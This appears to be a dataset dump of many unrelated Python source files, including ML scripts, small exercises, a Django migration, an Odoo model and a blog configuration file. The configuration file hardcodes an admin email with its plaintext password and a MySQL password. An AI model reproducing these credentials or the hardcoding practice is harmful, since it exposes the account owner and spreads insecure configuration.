text stringlengths 38 1.54M |
|---|
#
#
#
# This is python example 2.
# Ported from Python 2: print is a function in Python 3, and the
# statement-terminating semicolons were un-idiomatic noise.
x = 10
y = 25
print('x + y = ', x + y)
print('x * y = ', x * y)
|
# Generated by Django 3.1.6 on 2021-04-21 04:42
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add an optional buyer_email column to the order app's Block model."""

    dependencies = [
        ('order', '0022_auto_20210421_0430'),
    ]
    operations = [
        migrations.AddField(
            model_name='block',
            name='buyer_email',
            # null=True keeps the schema change safe for existing rows.
            field=models.CharField(max_length=100, null=True),
        ),
    ]
|
# Project Euler #4: find the largest palindrome that is a product of two
# three-digit numbers. (Original Turkish names kept: "sayi" = number,
# "enbüyük" = largest, "liste" = list.)
x = range(100, 1000)
y = range(100, 1000)
liste = []          # all palindromic products, as strings
enbüyük = [111111]  # seed value, smaller than the answer (906609)
for a in x:
    for b in y:
        sayi = str(a * b)
        # A string is a palindrome iff it equals its own reverse; this
        # replaces the original manual char-by-char loop with for/else.
        if sayi == sayi[::-1]:
            liste.append(sayi)
for each in liste:
    # Compare numerically: the stored values are strings.
    if int(enbüyük[0]) < int(each):
        enbüyük[0] = each
print(enbüyük[0])
|
# --*-- coding:utf-8 --*--
# for Python 2.7
from __future__ import division, print_function
import numpy as np
import matplotlib.pyplot as plt
from filature.bave import qvlbave
plt.figure(figsize=(10.0, 8.0))
bave = qvlbave.QVLBave(1200, 2.8, 1.8 / 2.8, 300.0 / 1200.0)
bave2 = qvlbave.QVLBave2(1200, 1.8 / 1200, 1 / 1200, 300 / 1200)
# Sample positions along the bave (0..1200).
pos = np.array([0, 100, 200, 300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200])
size1 = bave.value(pos)
size2 = bave2.value(pos)
# BUG FIX: plt.plot(x, y, fmt, "blue") passed "blue" as an extra *positional*
# argument, which pyplot tries to parse as the start of another data set;
# the colour must be passed via the `color` keyword.
plt.plot(pos, size1, "--", color="blue")
plt.plot(pos, size2, "-*", color="red")
plt.show()
|
# -*- coding: utf-8 -*-
# yumo
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d.art3d import Poly3DCollection
g_Ax = None
def InitSystem():
    """Create the figure and the shared 3D axes (stored in module global g_Ax)."""
    global g_Ax
    fig = plt.figure()
    g_Ax = fig.add_subplot(111, projection='3d')
def DrawTriList(triList):
    """Add each triangle in triList to the shared 3D axes.

    Each element is drawn as a translucent cyan face with thin red edges.
    Requires InitSystem() to have been called first (g_Ax must be set).
    """
    for tri in triList:
        g_Ax.add_collection3d(Poly3DCollection(tri, facecolors='cyan', linewidths=0.5, edgecolors='r', alpha=.25))
def Show(xyzrange):
    """Set the (x, y, z) axis limits and display the figure.

    xyzrange: sequence of three (min, max) pairs, one per axis.
    """
    plt.xlim(xyzrange[0])
    plt.ylim(xyzrange[1])
    global g_Ax
    # pyplot has no zlim() helper; the z range must be set on the 3D axes.
    g_Ax.set_zlim3d(xyzrange[2][0], xyzrange[2][1])
    #plt.zlim(xyzrange[2])
    plt.show()
|
import time
def timeme(method):
    """Decorator: print how long each call to *method* takes, in whole ms.

    The wrapped function's return value is passed through unchanged.
    """
    from functools import wraps  # local import keeps the decorator self-contained

    @wraps(method)  # FIX: preserve __name__/__doc__ of the wrapped function
    def wrapper(*args, **kw):
        start_time = time.time()
        result = method(*args, **kw)
        end_time = time.time()
        print(method.__name__, int(round((end_time - start_time) * 1000)), "ms")
        return result
    return wrapper
|
# <p>Create a function running_average that returns a function.
# When the function returned is passed a value, the function returns the current
# average of all previous function calls. You will have to use closure to solve this.
# You should round all answers to the 2nd decimal place.</p>
'''
rAvg = running_average()
rAvg(10) # 10.0
rAvg(11) # 10.5
rAvg(12) # 11
rAvg2 = running_average()
rAvg2(1) # 1
rAvg2(3) # 2
'''
def running_average():
    """Return a closure that tracks the running mean of the values it has seen.

    Each call feeds one value in and returns the current average of all
    values so far, rounded to 2 decimal places.
    """
    state = {"total": 0, "count": 0}

    def inner(value):
        state["count"] += 1
        state["total"] += value
        return round(state["total"] / state["count"], 2)

    return inner
# Demo: two independent closures keep independent running state.
rAvg = running_average()
for sample in (10, 11, 12):
    print(rAvg(sample))  # 10.0, 10.5, 11.0
rAvg2 = running_average()
for sample in (1, 3):
    print(rAvg2(sample))  # 1.0, 2.0
|
"""
Bite 313. Alternative constructors
In this Bite your are provides with a Domain class and a DomainException custom exception class.
You will add some validation to the current constructor to check if a valid domain name is passed in.
Next you will add a __str__ special method to represent the object (basically the name attribute)
and you will write two classmethods to construct domains:
1. from a URL
2. from an email
Here you can see the code in action (also make sure you check out the tests):
# >>> from constructors import Domain
# >>> str(Domain('google.com'))
# 'google.com'
# >>> str(Domain.parse_url("http://pybit.es"))
# 'pybit.es'
# >>> domain = Domain.parse_email("julian@pybit.es")
# >>> type(domain)
# <class 'constructors.Domain'>
# >>> str(domain)
'pybit.es'
"""
from urllib.parse import urlparse
import re
class DomainException(Exception):
    """Raised when an invalid domain name is used to create a Domain."""
class Domain:
    """A validated internet domain name, e.g. ``google.com``.

    Provides two alternate constructors: ``parse_url`` and ``parse_email``.
    """

    # Name must end in a dot followed by a 2-3 letter TLD.
    # NOTE(review): this rejects longer TLDs such as ``.info`` — confirm intended.
    # Compiled once at class level instead of on every validation call.
    _NAME_RE = re.compile(r".*\.[a-z]{2,3}$")

    def __init__(self, name):
        self.name = self._is_valid_name(name)

    def _is_valid_name(self, name):
        """Return *name* unchanged, or raise DomainException if it is invalid."""
        if not self._NAME_RE.match(name):
            # FIX: raise with a message instead of a bare exception class.
            raise DomainException(f"{name} is an invalid domain")
        return name

    @classmethod
    def parse_url(cls, url):
        """Alternate constructor: build a Domain from a URL's network location."""
        return cls(urlparse(url).netloc)

    @classmethod
    def parse_email(cls, email):
        """Alternate constructor: build a Domain from the part after the '@'."""
        return cls(email.split('@')[1])

    def __str__(self):
        return self.name
|
import numpy as np
from utils import bbox_utils
def encode_textboxes(y, epsilon=10e-5):
    """ Encode the label to a proper format suitable for training TextBoxes PlusPlus network.
    Args:
    - y: A numpy of shape (num_default_boxes, 2 + 12 + 8) representing a label sample.
         Per row, the last 20 columns are: 12 gt textbox values
         (cx, cy, w, h, x1, y1, ..., x4, y4), then 4 default-box values
         (cx, cy, w, h), then 4 variances.
    - epsilon: small constant (10e-5 == 1e-4) guarding log() against zero ratios.
    Returns:
    - A numpy array with the same shape as y but its gt boxes values has been encoded to the proper TextBoxes PlusPlus format.
      NOTE: y is modified in place and also returned.
    Paper References:
    - Liao, M., Shi, B., & Bai, X. (2018). TextBoxes++: A Single-Shot Oriented Scene Text Detector. https://arxiv.org/abs/1801.02765
      (corrected: the previous link, 1512.02325, is the SSD paper)
    """
    gt_textboxes = y[:, -20:-8]
    df_boxes = y[:, -8:-4]
    # Default boxes as corner vertices, used for the x1..y4 offsets below.
    df_boxes_vertices = bbox_utils.center_to_vertices(df_boxes)
    variances = y[:, -4:]
    # Center/size offsets, SSD-style: normalized by box size and variance.
    encoded_gt_textboxes_cx = ((gt_textboxes[:, 0] - df_boxes[:, 0]) / (df_boxes[:, 2])) / np.sqrt(variances[:, 0])
    encoded_gt_textboxes_cy = ((gt_textboxes[:, 1] - df_boxes[:, 1]) / (df_boxes[:, 3])) / np.sqrt(variances[:, 1])
    encoded_gt_textboxes_w = np.log(epsilon + gt_textboxes[:, 2] / df_boxes[:, 2]) / np.sqrt(variances[:, 2])
    encoded_gt_textboxes_h = np.log(epsilon + gt_textboxes[:, 3] / df_boxes[:, 3]) / np.sqrt(variances[:, 3])
    # Quadrilateral vertex offsets relative to the default box corners.
    encoded_gt_textboxes_x1 = ((gt_textboxes[:, 4] - df_boxes_vertices[:, 0, 0]) / df_boxes[:, 2]) / np.sqrt(variances[:, 0])
    encoded_gt_textboxes_y1 = ((gt_textboxes[:, 5] - df_boxes_vertices[:, 0, 1]) / df_boxes[:, 3]) / np.sqrt(variances[:, 1])
    encoded_gt_textboxes_x2 = ((gt_textboxes[:, 6] - df_boxes_vertices[:, 1, 0]) / df_boxes[:, 2]) / np.sqrt(variances[:, 0])
    encoded_gt_textboxes_y2 = ((gt_textboxes[:, 7] - df_boxes_vertices[:, 1, 1]) / df_boxes[:, 3]) / np.sqrt(variances[:, 1])
    encoded_gt_textboxes_x3 = ((gt_textboxes[:, 8] - df_boxes_vertices[:, 2, 0]) / df_boxes[:, 2]) / np.sqrt(variances[:, 0])
    encoded_gt_textboxes_y3 = ((gt_textboxes[:, 9] - df_boxes_vertices[:, 2, 1]) / df_boxes[:, 3]) / np.sqrt(variances[:, 1])
    encoded_gt_textboxes_x4 = ((gt_textboxes[:, 10] - df_boxes_vertices[:, 3, 0]) / df_boxes[:, 2]) / np.sqrt(variances[:, 0])
    encoded_gt_textboxes_y4 = ((gt_textboxes[:, 11] - df_boxes_vertices[:, 3, 1]) / df_boxes[:, 3]) / np.sqrt(variances[:, 1])
    # Write the encoded values back into the label, in place.
    y[:, -20] = encoded_gt_textboxes_cx
    y[:, -19] = encoded_gt_textboxes_cy
    y[:, -18] = encoded_gt_textboxes_w
    y[:, -17] = encoded_gt_textboxes_h
    y[:, -16] = encoded_gt_textboxes_x1
    y[:, -15] = encoded_gt_textboxes_y1
    y[:, -14] = encoded_gt_textboxes_x2
    y[:, -13] = encoded_gt_textboxes_y2
    y[:, -12] = encoded_gt_textboxes_x3
    y[:, -11] = encoded_gt_textboxes_y3
    y[:, -10] = encoded_gt_textboxes_x4
    y[:, -9] = encoded_gt_textboxes_y4
    return y
|
import numpy as np
import cv2
# insert any image file you want here
# insert any image file you want here
img = cv2.imread('image.jpg')
# BUG FIX: cv2.imread returns None (it does not raise) when the file is
# missing or unreadable; fail early with a clear message instead of
# crashing later on img.dtype.
if img is None:
    raise FileNotFoundError("could not read 'image.jpg'")
# open window
cv2.namedWindow('Image', cv2.WINDOW_NORMAL)
# show image in window
cv2.imshow('Image', img)
cv2.imwrite("output.jpg", img)
print(img)
print(img.dtype)
print(img.shape)
# like console readline: block until a key is pressed
cv2.waitKey()
|
import json
import sys
import io
def stringToIntegerList(input):
    """Deserialize a JSON array string (e.g. "[1,2,3]") into a Python list."""
    parsed = json.loads(input)
    return parsed
class ListNode:
    # Singly linked list node: an integer payload and the next node (or None).
    def __init__(self,val=0,next=None):
        self.val=val
        self.next=next
def stringToListNode(input):
    """Build a singly linked list from a JSON array string; return its head."""
    sentinel = ListNode(0)  # dummy node so the loop needs no special first case
    tail = sentinel
    for number in stringToIntegerList(input):
        tail.next = ListNode(number)
        tail = tail.next
    return sentinel.next
class Solution:
    def addTwoNumbers(self, l1:ListNode, l2:ListNode):
        """Add two non-negative numbers stored as reversed-digit linked lists.

        Returns the head of a new list holding the sum, least significant
        digit first.

        BUG FIX: the original accumulated through var1/var2, which kept
        *stale* values from the previous iteration once one list was
        exhausted — lists of different lengths produced wrong digits, and a
        final carry-only iteration reused the previous var2.
        """
        head = ListNode()  # dummy node; the result starts at head.next
        p = head
        carry = 0
        while carry or l1 or l2:
            total = carry
            if l1:
                total += l1.val
                l1 = l1.next
            if l2:
                total += l2.val
                l2 = l2.next
            carry, digit = divmod(total, 10)
            p.next = ListNode(digit)
            p = p.next
        return head.next
def ListNodeToString(node):
    """Render a linked list as "[v1, v2, ...]"; return None for an empty list."""
    if not node:
        return None
    values = []
    while node:
        values.append(str(node.val))
        node = node.next
    return "[" + ", ".join(values) + "]"
def EnterMain():
    """Read pairs of JSON-array lines from stdin, add each pair as
    linked-list numbers, and print the sum until EOF."""
    def readline():
        # Wrap stdin so input is decoded as UTF-8 regardless of locale.
        for line in io.TextIOWrapper(sys.stdin.buffer,encoding='utf-8'):
            yield line.strip('\n')
    lines=readline()
    while True:
        try:
            line=next(lines)
            l1=stringToListNode(line)
            line=next(lines)
            l2=stringToListNode(line)
            node=Solution().addTwoNumbers(l1, l2)
            out=ListNodeToString(node)
            print(out)
        except StopIteration:
            # Generator exhausted: no more input pairs.
            break
if __name__ == '__main__':
EnterMain() |
# -*- coding: utf-8 -*-
from openerp import models, fields, api, _
from openerp.exceptions import UserError, ValidationError, Warning
class cashadvance(models.Model):
    # Cash-advance record; registered under the model name 'comben.cashadvance'.
    _name = 'comben.cashadvance'
    # Human-readable sequence number, assigned automatically on create.
    sequence_id =fields.Char(string='Sequence ID')
    @api.model
    def create(self, vals):
        # Stamp each new record with the next value of the 'comben.cashadvance'
        # ir.sequence before delegating to the standard create.
        # NOTE(review): ir.sequence.get() is the legacy API — newer Odoo
        # versions use next_by_code(); confirm the target version.
        vals['sequence_id'] = self.env['ir.sequence'].get('comben.cashadvance')
        return super(cashadvance, self).create(vals)
import cMonster
import pygame
from cAnimSprite import cAnimSprite
import functions as BF
class cItemBouncer(cMonster.cMonster):
    """Bouncer item: flips a stick's rotation on collision; not a monster."""

    # This is a little dirty: mirrors the value assigned in cAnimSpriteFactory.
    BSPRITEFAC = 1

    def __init__(self, x, y, rot):
        cMonster.cMonster.__init__(self, x, y, rot)
        self.image = pygame.image.load("sprites/bouncer.png").convert_alpha()
        self.rect = self.image.get_rect().move(x, y)
        self.mask = pygame.mask.from_surface(self.image)
        idle_frames = BF.load_and_slice_sprite(32, 32, 'bouncer_nanim.png')
        collision_frames = BF.load_and_slice_sprite(32, 32, 'bouncer_anim.png')
        self.anim = cAnimSprite(idle_frames, 5)
        self.col_anim = cAnimSprite(collision_frames, 20)
        self.anim.rect = self.rect
        self.col_anim.rect = self.rect
        # Status sets: the collision animation starts hidden.
        self.col_anim.draw = False

    def onCollision(self, stick, status):
        stick.flip_rotation()

    def isMonster(self):
        return False
|
import re
class Validate:
    """Signup-form validation: username, password (+confirmation) and email.

    The *_val methods return re match objects (or None/True), matching the
    original truthy/falsy contract; validate() returns True or None.
    """

    def __init__(self, username=None, password=None, ver_password=None, email=None):
        self.username = username
        self.password = password
        self.ver_password = ver_password
        self.email = email

    def username_val(self):
        """Match object if username is 3-20 word chars/dashes, else None."""
        USER_RE = re.compile(r"^[a-zA-Z0-9_-]{3,20}$")
        return USER_RE.match(self.username)

    def password_val(self):
        """Match object if password is 3-20 characters long, else None."""
        PASS_RE = re.compile(r"^.{3,20}$")
        return PASS_RE.match(self.password)

    def equal(self):
        """True when the password and its confirmation are identical."""
        return self.password == self.ver_password

    def email_val(self):
        """Truthy when email is absent or looks like addr@host.tld.

        BUG FIX: the original returned the compiled pattern itself (always
        truthy) instead of matching it against the address, so *any* email
        passed validation. The dot before the TLD is now escaped as well.
        """
        if self.email:
            EMAIL_RE = re.compile(r"^[\S]+@[\S]+\.[\S]+$")
            return EMAIL_RE.match(self.email)
        return True

    def validate(self):
        """True when every individual check passes (None otherwise)."""
        if self.username_val() and self.password_val() and self.equal() and self.email_val():
            return True
|
__author__ = 'makarenok'
from model.contact import Contact
import random
def test_modify_contact_first_name(app, db, check_ui):
    """Modify a random contact's first name; verify via DB and optionally UI.

    Fixtures: app drives the application, db reads the ORM directly,
    check_ui enables the slower UI cross-check.
    """
    # Ensure there is at least one contact to modify.
    if app.contact.count() == 0:
        app.contact.create(Contact(firstname="testFirstName", middlename="testMiddleName"))
    old_contacts = db.get_contact_list()
    contact = random.choice(old_contacts)
    new_contact = Contact(firstname="New firstName")
    # Keep the id so the modified record can be matched afterwards.
    new_contact.id = contact.id
    app.contact.modify_contact_by_id(contact.id, new_contact)
    new_contacts = db.get_contact_list()
    assert len(old_contacts) == len(new_contacts)
    # Substitute the expected record into the old snapshot, then compare
    # both lists order-independently.
    for i, old_contact in enumerate(old_contacts):
        if old_contact.id == contact.id:
            old_contacts[i] = new_contact
    assert sorted(old_contacts, key=Contact.id_or_max) == sorted(new_contacts, key=Contact.id_or_max)
    if check_ui:
        assert sorted(new_contacts, key=Contact.id_or_max) == sorted(app.contact.get_contact_list(), key=Contact.id_or_max)
# def test_modify_contact_middle_name(app):
# if app.contact.count() == 0:
# app.contact.create(Contact(first_name="testFirstName", middle_name="testMiddleName"))
# old_contacts = app.contact.get_contact_list()
# app.contact.modify_first_contact(Contact(middle_name="New middleName"))
# new_contacts = app.contact.get_contact_list()
# assert len(old_contacts)== len(new_contacts)
|
__author__ = 'spijs'
from evaluationStrategy import EvaluationStrategy
import nltk
import nltkbleu
class BleuScore(EvaluationStrategy):
    '''BLEU evaluation of the generated sentences
    -> should ONLY be used for evaluating and sorting individual sentences.
    multi-bleu.perl should be used for evaluating a full corpus.
    (Python 2 module: uses print statements.)'''
    def evaluate_sentence(self,sentence,references,n):
        ''' Evaluates and returns the bleu score of a single sentence given its references and n of ngrams '''
        ref_texts = []
        weights = self.get_weights(n)
        for ref in references:
            ref_texts.append(nltk.word_tokenize(ref))
        cand = nltk.word_tokenize(sentence)
        bleu = 0
        #sf = nltkbleu.SmoothingFunction()
        if cand and len(cand)>0:
            bleu = nltkbleu.sentence_bleu(ref_texts,cand,weights)
        # Log zero-score candidates for debugging.
        if bleu == 0:
            print "candidate :" + str(cand)
            print "references : "+ str(ref_texts)
        return bleu
    def evaluate_total(self,sentences,references,n):
        ''' Evaluates and returns the bleu score of a corpus of sentences given their references and n of ngrams
        SHOULD NOT BE USED'''
        candidates = []
        final_references = []
        for sentence in sentences:
            candidates.append(nltk.word_tokenize(sentence))
        # references: one list of reference strings per image/sentence.
        for imagerefs in references:
            tokenizedrefs = []
            for imageref in imagerefs:
                tokenizedrefs.append(nltk.word_tokenize(imageref))
            final_references.append(tokenizedrefs)
        return nltkbleu.corpus_bleu(final_references,candidates,self.get_weights(n))
    def get_weights(self,n):
        ''' Returns a list of uniform weights, based on the choice of n'''
        value = 1/(n*1.0)
        weights = []
        for i in range(n):
            weights.append(value)
        return weights
from __future__ import division # let 5/2 = 2.5 rather than 2
from Aerothon.ACPropeller import ACPropeller
from Aerothon.AeroUtil import STDCorrection
import numpy as npy
import pylab as pyl
from scalar.units import IN, LBF, SEC, ARCDEG, FT, RPM, OZF, GRAM, gacc, Pa, degR, W, inHg, K
from scalar.units import AsUnit
# Set Propeller properties
# Propeller geometry and aero model parameters (Python 2 script; units come
# from the project's scalar.units library).
Prop = ACPropeller()
Prop.name = 'Graupner 13.5x6' #This is a Santiago especial
Prop.D = 13.5*IN
Prop.Thickness = 5/8*IN
Prop.Pitch = 6*IN
Prop.dAlpha = 3.7*ARCDEG
Prop.Solidity = 0.0135
Prop.AlphaStall = 15*ARCDEG
Prop.AlphaZeroCL = 0*ARCDEG
Prop.CLSlope = 0.08/ARCDEG
Prop.CDCurve = 2.3
Prop.CDp = 0.01
# NOTE(review): 100 lbf looks implausibly heavy for a 13.5" prop — confirm units.
Prop.Weight = 100*LBF
#
# These are corrected for standard day
#Standard correction for 2:00 pm for the test day
STD = STDCorrection(30.03*inHg, (19 + 273.15)*K)
#
# RPM, Thrust
Prop.ThrustData = [(4560 *RPM, (2 *LBF + 13*OZF)*STD),
                   #(13500 *RPM, (9 *LBF + 3*OZF)*STD),
                   (5760 *RPM, (3 *LBF + 7*OZF)*STD),
                   (6900 *RPM, (4 *LBF + 5*OZF)*STD),
                   (7890 *RPM, (4 *LBF + 9*OZF)*STD),
                   (9300 *RPM, (7 *LBF + 6*OZF)*STD),
                   (9450 *RPM, (7 *LBF + 12*OZF)*STD),
                   (8200 *RPM, (6 *LBF + 5*OZF)*STD),
                   (4230 *RPM, (2 *LBF + 0*OZF)*STD),
                   (5430 *RPM, (2 *LBF + 12*OZF)*STD),
                   (6390 *RPM, (3 *LBF + 15*OZF)*STD),
                   (7200 *RPM, (4 *LBF + 4*OZF)*STD),
                   (8010 *RPM, (5 *LBF + 7*OZF)*STD),
                   (8400 *RPM, (6 *LBF + 0*OZF)*STD),
                   (8700 *RPM, (7 *LBF + 3*OZF)*STD),
                   (6940 *RPM, (7 *LBF + 4*OZF)*STD),
                   (9180 *RPM, (7 *LBF + 5*OZF)*STD),
                   (9420 *RPM, (7 *LBF + 11*OZF)*STD),
                   (9630 *RPM, (8 *LBF + 7*OZF)*STD),
                   (9600 *RPM, (8 *LBF + 9*OZF)*STD)]
# Second test session: different barometric pressure, same temperature.
STD = STDCorrection(30.3*inHg, (19 + 273.15)*K)
ThrustData = [(3450 *RPM, (1 *LBF + 4*OZF)*STD),
              (5070 *RPM, (2 *LBF + 10*OZF)*STD),
              (5940 *RPM, (3 *LBF + 12*OZF)*STD),
              (6930 *RPM, (4 *LBF + 14*OZF)*STD),
              (8100 *RPM, (6 *LBF + 11*OZF)*STD),
              (8670 *RPM, (8 *LBF + 3*OZF)*STD),
              (9210 *RPM, (8 *LBF + 8*OZF)*STD),
              (9660 *RPM, (9 *LBF + 1*OZF)*STD),
              (9670 *RPM,(9 *LBF + 3*OZF)*STD)]
Prop.ThrustData += ThrustData
# Torque measured as force at the end of a 19.5 in moment arm.
Arm = 19.5*IN
# RPM, Torque
Prop.TorqueData = [(9720 *RPM, (4.75*Arm*OZF)*STD),
                   (4470 *RPM, (.50*Arm*OZF)*STD),
                   (5610 *RPM, (1.20*Arm*OZF)*STD),
                   (6690 *RPM, (1.75*Arm*OZF)*STD),
                   (8010 *RPM, (3.0*Arm*OZF)*STD),
                   (8640 *RPM, (3.60*Arm*OZF)*STD),
                   (9330 *RPM, (4.35*Arm*OZF)*STD),
                   (9720 *RPM, (4.65*Arm*OZF)*STD),
                   (9300 *RPM, (4.40*Arm*OZF)*STD),
                   (8460 *RPM, (3.25*Arm*OZF)*STD),
                   (7230 *RPM, (2.30*Arm*OZF)*STD),
                   (4560 *RPM, (.75*Arm*OZF)*STD)]
################################################################################
if __name__ == '__main__':
    Vmax = 100
    h=0*FT
    N=npy.linspace(1000, 10000, 5)*RPM
    Alpha = npy.linspace(-25,25,41)*ARCDEG
    V = npy.linspace(0,Vmax,30)*FT/SEC
    # Coefficient and power/thrust plots over the sampled RPM/velocity grid.
    Prop.CoefPlot(Alpha,fig = 1)
    Prop.PTPlot(N,V,h,'V', fig = 2)
    #
    # N = npy.linspace(0, 13000,31)*RPM
    # V = npy.linspace(0,Vmax,5)*FT/SEC
    #
    # Prop.PTPlot(N,V,h,'N', fig = 3)
    Prop.PlotTestData(fig=4)
    N = 9600*RPM
    # Python 2 print statements: compare model predictions with measured data.
    print "Max " + AsUnit(Prop.MaxRPM(), 'rpm', '%3.0f') + " at " + AsUnit(Prop.MaxTipSpeed, 'ft/s') + " tip speed "
    print
    print "Static Thrust : ", AsUnit( Prop.T(N, 0*FT/SEC, h), 'lbf' )
    print "Measured Thrust : ", AsUnit( max(npy.array(Prop.ThrustData)[:,1]), 'lbf' )
    N = 9700*RPM
    print
    print "Static Torque : ", AsUnit( Prop.P(N, 0*FT/SEC, h)/N, 'in*ozf' )
    print "Measured Torque : ", AsUnit( max(npy.array(Prop.TorqueData)[:,1]), 'in*ozf' )
    pyl.show()
|
#!/usr/bin/env python
#coding=utf-8
import os
# Site information
WEB_URL='/'
WEB_NAME='上帝De助手 的博客'
WEB_SUBNAME='我只生产内容,我不是互联网的搬运工!'
WEB_TITLE='seo基础入门教程_网络营销入门学习_移动互联网创业项目故事'
WEB_KEYWORDS='seo基础入门教程,互联网络营销入门学习,移动互联网创业项目,互联网创业故事'
WEB_DESCRIPTION='发布有关seo相关的基础学习教程,开发seo相关的工具;学习互联网思维,并运用互联网思维进行网络营销策划;同时关注各行业互联网、移动互联网创业项目的发展。'
TEMPLATE_THEME='default'
PER_PAGE_COUNT = 10
# Account settings
# SECURITY(review): credentials are stored in plaintext in source control —
# consider loading them from environment variables instead.
ADMIN_USERNAME = 'five3@163.com'
ADMIN_PASSWORD='chenxiaowu'
# Project configuration
DEFAULT_PATH='/index/index'
DEBUG_SWITCH=True
# Post status labels: 1 = published ('发布'), 0 = draft ('草稿')
STATUS_LIST = {1:'发布',0:'草稿'}
# Path information (all derived from the current working directory)
ROOT_PATH=os.getcwd()+'/'
DATA_DIR_PATH=ROOT_PATH+'data/'
TMP_DIR_PATH=ROOT_PATH+'data/cache/'
# Directory layout
UPLOAD_DIR='static/upload/'
TPL_DIR = 'templates'
ADMIN_TPL_DIR='admin'
# Database settings
# DB_TYPE='sqlite'
# DB_STRING=DATA_DIR_PATH+'cms.db'
# DB_TABEL_PREFIX='cms_'
DB_TYPE='mysql'
DB_STRING='localhost/3306/root/changeit!/weblog'
DB_TABEL_PREFIX='cms_'
|
# -*- coding: utf-8 -*-
# Autor: Cristian Sáez Mardones
# Fecha: 18-04-2021
# Versión: 1.0.0
# Objetivo: Crear un juego de batallas pokemon
# Importación de archivo
# No hay
# Importación de bibliotecas
# Si hay
# Importación de funciones
# No hay
### Bibliotecas ###
# Biblioteca para el manejo de rutas
from pathlib import Path
# Biblioteca para e manejo de ficheros JSON
import json
# Directory containing this script; the JSON data files live under ./archivos.
ruta = Path(__file__).resolve().parent
#####################################################################
# Función: Escribir los tipos de pokemon en un archivo json
# Entrada: diccionario con tipos de pokemon
# Salida: No hay
def write_types(types:dict) -> None:
    """Persist the pokemon-type dictionary to archivos/types.json."""
    target = ruta / 'archivos' / 'types.json'
    with open(target, 'w') as json_file:
        json.dump(types, json_file, indent=4)
#####################################################################
# Función: Leer el fichero json con los tipos de pokemon
# Entrada: No hay entrada en la función
# Salida: Lista con los tipos de pokemon
def read_types() -> dict:
    """Return the 'types' entry stored in archivos/types.json."""
    source = ruta / 'archivos' / 'types.json'
    with open(source) as json_file:
        return json.load(json_file)['types']
#####################################################################
# Función: Escribir los pokemon junto a sus datos en un archivo json
# Entrada: diccionario con tipos de pokemon
# Salida: No hay
def write_pokemons(pokemons:dict) -> None:
    """Persist the pokemon data dictionary to archivos/pokemons.json."""
    target = ruta / 'archivos' / 'pokemons.json'
    with open(target, 'w') as json_file:
        json.dump(pokemons, json_file, indent=4)
#####################################################################
# Función: Leer el fichero json con los pokemon
# Entrada: No hay entrada en la función
# Salida: Diccionario con la información de los pokemon
def read_pokemons() -> dict:
    """Return the 'pokemons' entry stored in archivos/pokemons.json."""
    source = ruta / 'archivos' / 'pokemons.json'
    with open(source) as json_file:
        return json.load(json_file)['pokemons']
#####################################################################
# Función: Escribir las naturalezas pokemon en un archivo json
# Entrada: diccionario con naturalezas de pokemon
# Salida: No hay
def write_natures(natures:dict) -> None:
    """Persist the pokemon-nature dictionary to archivos/natures.json."""
    target = ruta / 'archivos' / 'natures.json'
    with open(target, 'w') as json_file:
        json.dump(natures, json_file, indent=4)
#####################################################################
# Función: Leer el fichero json con las naturalezas pokemon
# Entrada: No hay entrada en la función
# Salida: Lista con las naturalezas pokemon
def read_natures() -> dict:
    """Return the 'natures' entry stored in archivos/natures.json."""
    source = ruta / 'archivos' / 'natures.json'
    with open(source) as json_file:
        return json.load(json_file)['natures']
import time
import numpy as np
from sklearn.datasets import fetch_mldata
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
np.random.seed(0)
# NOTE(review): fetch_mldata was removed from scikit-learn (mldata.org is
# defunct); modern code uses fetch_openml('mnist_784'). Kept as-is here.
mnist = fetch_mldata('MNIST original')
# Append the targets as a final column so features + labels shuffle together.
data = np.hstack((mnist.data, mnist.target.reshape(-1, 1)))
np.random.shuffle(data)
# with open('mnist.csv', 'wb') as f:
#     np.savetxt(f, data.astype(int), fmt='%i', delimiter=',')
# Standard MNIST split: first 60000 rows train, remainder test.
X_tr, y_tr = data[:60000, :-1], data[:60000, -1]
X_te, y_te = data[60000:, :-1], data[60000:, -1]
# Scale pixel values into [0, 1].
X_tr /= 255
X_te /= 255
training_times = []
prediction_times = []
# Benchmark: 50 independent fit/predict rounds on fresh estimators.
for _ in range(50):
    softmax = LogisticRegression(tol=1e-4, C=1e10, solver='lbfgs', multi_class='multinomial')
    t0 = time.time()
    softmax.fit(X_tr, y_tr)
    training_times.append(time.time() - t0)
    t0 = time.time()
    softmax.predict(X_te)
    prediction_times.append(time.time() - t0)
# One extra fit purely for the accuracy measurement.
softmax = LogisticRegression(tol=1e-4, C=1e10, solver='lbfgs', multi_class='multinomial')
softmax.fit(X_tr, y_tr)
y_te_pred = softmax.predict(X_te)
training_times = np.array(training_times)
prediction_times = np.array(prediction_times)
# Report mean +/- two standard deviations.
print("Training time: {:.3f}s (+/- {:.3f}s)".format(training_times.mean(), 2 * training_times.std()))
print("Prediction time: {:.3f}s (+/- {:.3f}s)".format(prediction_times.mean(), 2 * prediction_times.std()))
print("Test set accuracy: {:.4f}".format(accuracy_score(y_te, y_te_pred)))
|
from __future__ import division
import numpy as np
import pandas as pd
from multiprocessing import Pool
from matplotlib import pyplot as plt
def load_panel(a):
    """Load a pickled pandas object from path *a*."""
    return pd.read_pickle(a)
def time_index(a):
    """Re-index *a* with its index converted to a DatetimeIndex.

    (Index.to_datetime is legacy pandas API — kept for behavior parity.)
    """
    return a.reindex(index=a.index.to_datetime())
def resamp(a):
    """Resample *a* into 10-minute bins."""
    return a.resample('10T')
def resamp_std(a):
    """Resample *a* into 10-minute bins, aggregating with the standard
    deviation (legacy pandas `how=` keyword, kept for behavior parity)."""
    return a.resample('10T',how='std')
def angle(a):
    """Flow direction in radians: arctan2 of the 'v' over the 'u' component."""
    return np.arctan2(a['v'], a['u'])
def angle_plus(a):
    """Keep only the strictly positive entries of *a*."""
    return a[a > 0]
def angle_minus(a):
    """Keep only the strictly negative entries of *a*."""
    return a[a < 0]
def getvalues(a):
    """Summary statistics (describe) of the column-wise maxima of *a*."""
    return a.max().describe()
if __name__ == "__main__":
    # Pickled pandas panels: raw ADCP error records and corrected velocities
    # for flow stations 3-5 (2012 deployment).
    a1 = '/home/aidan/thesis/probe_data/panels/2012/flw_stn3_adcp_error'
    a2 = '/home/aidan/thesis/probe_data/panels/2012/flw_stn4_adcp_error'
    a3 = '/home/aidan/thesis/probe_data/panels/2012/flw_stn5_adcp_error'
